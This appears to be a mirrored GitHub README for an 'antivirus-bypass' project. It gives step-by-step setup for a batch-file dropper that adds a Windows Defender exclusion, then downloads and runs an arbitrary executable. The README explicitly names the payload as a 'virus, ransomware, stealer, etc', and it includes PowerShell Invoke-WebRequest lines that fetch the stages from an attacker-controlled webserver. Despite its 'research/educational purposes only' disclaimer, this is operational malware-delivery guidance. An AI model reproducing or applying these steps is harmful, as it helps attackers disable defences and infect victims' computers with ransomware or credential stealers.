Git Product home page Git Product logo

antivirus-bypass's Introduction

Antivirus Bypass

Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.

This project is intended for research/educational purposes only.

Setup

If you already have a webserver, skip to step 2.

1, To start setting up the bypass, you will need a webserver, you can create one by heading over to https://replit.com and creating an HTML, CSS & JS repl, after that, you will need to run the repl. It should then open up a website preview and give you the webserver URL above it.

2, Upload the file you wish to execute (virus, ransomware, stealer, etc) to the webserver and rename the file to installer.exe.

3, Edit line 31 in the installer.bat file:

Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.exe' -OutFile installer.exe"

Change https://YOURSITE.COM/installer.exe to your webserver URL. If you use replit, it should look like this: https://replname.wnetmc.repl.co/installer.exe

4, Upload the installer.bat to your webserver. 5, Edit line 4 in the main.bat file:

Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.bat' -OutFile installer.bat"

Replace https://YOURSITE.COM/installer.bat with your webserver URL and the path to the installer.bat file. If you use replit, it should look like this: https://replname.wnetmc.repl.co/installer.bat

6, Done. The file you would use to bypass windows defender would be main.bat. You can convert it to an executable but this will raise the number of detections. If this helped you, make sure to star this repository (;

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.